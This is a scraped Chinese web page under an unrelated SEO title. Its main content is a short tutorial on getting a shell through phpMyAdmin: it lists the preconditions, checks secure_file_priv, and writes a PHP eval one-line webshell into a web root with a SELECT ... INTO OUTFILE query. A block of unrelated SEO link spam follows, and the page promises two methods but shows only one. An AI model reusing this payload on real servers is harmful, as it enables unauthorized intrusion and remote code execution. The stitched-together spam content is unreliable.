当前位置: 首页 > news >正文

微信怎么做网站云盘搜索引擎入口

微信怎么做网站,云盘搜索引擎入口,做调研有哪些网站,wordpress打开非常慢0x00 前言 来到phpmyadmin页面后如何getshell呢?下面介绍两种方法 0x01 select into outfile直接写入 1、利用条件 对web目录需要有写权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secure_file…

0x00 前言

来到phpmyadmin页面后如何getshell呢?下面介绍两种方法

0x01 select into outfile直接写入

1、利用条件

  • 对web目录需要有写权限能够使用单引号(root)

  • 知道网站绝对路径(phpinfo/php探针/通过报错等)

  • secure_file_priv没有具体值

2、查看secure_file_priv值

show global variables like '%secure%';

关于secure_file_priv配置介绍:

secure_file_priv 是用来限制 load dumpfile、into outfile、load_file() 函数在哪个目录下拥有上传或者读取文件的权限

当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权
当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权
当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权

我这里的secure_file_priv值为NULL,所以不能够导入或导出

secure_file_priv这个值是只读变量,只能通过配置文件修改。如果管理员没有配置,那么我们是无法进行写入shell的,这里我为了测试能否写入修改一下

在MySQL的配置文件my.ini中进行配置:

修改后secure_file_priv的值如图所示:

3、写入一句话

select '<?php @eval($POST[1]); ?>' INTO OUTFILE 'D:\\phpStudy\\PHPTutorial\\WWW\\a.php'

这里需要注意的一个点是路径需要用"\\"

查看下根目录

http://www.hengruixuexiao.com/news/17028.html

相关文章:

  • 益阳网站seo百度关键字优化精灵
  • 青岛专业制作网站的公司吗百度客服号码
  • 上传空间站的注意事项赣州seo推广
  • the word和 a wordpressseo常用工具有哪些
  • 企业注册登记查询seo网站排名优化培训教程
  • wordpress建站心得互联网广告营销是什么
  • 快速网站建设一站式网络营销
  • 推广网站有那些百度商业账号登录
  • 网站服务类型是什么意思关于进一步优化落实疫情防控措施
  • 东莞网络推广怎么样seo优化课程
  • 网站手机网页如何做小学生摘抄新闻
  • 怎么停止网站要做网络推广
  • 企业营销型网站建设哪家公司好矿坛器材友情交换
  • 网站产品页面设计关键词seo公司推荐
  • 网站建设是什么意思如何自己开网站
  • wordpress另一更新网站seo推广招聘
  • 网站建设ps模板seo快排优化
  • 网站内页怎么做301定向国内做网站的公司
  • 哪家网站建设公司专业站长素材音效下载
  • 正规网站建设济南网站推广公司
  • 栅格系统做的网站西安seo服务外包
  • 大学 两学一做专题网站太原seo管理
  • 免费建站网站建设微信营销管理软件
  • 北京最新消息今天新闻seo搜索引擎优化内容
  • 宝宝投票网站怎么做客服系统网页源码2022免费
  • 网站建设意义模板网搜网
  • 怎么做的360网站打不开广州网站建设公司
  • 最专业的网站建设公司让手机变流畅的软件下载
  • 往网站上传照片怎么做优化大师官方
  • 天台网站建设2024年新冠疫情最新消息今天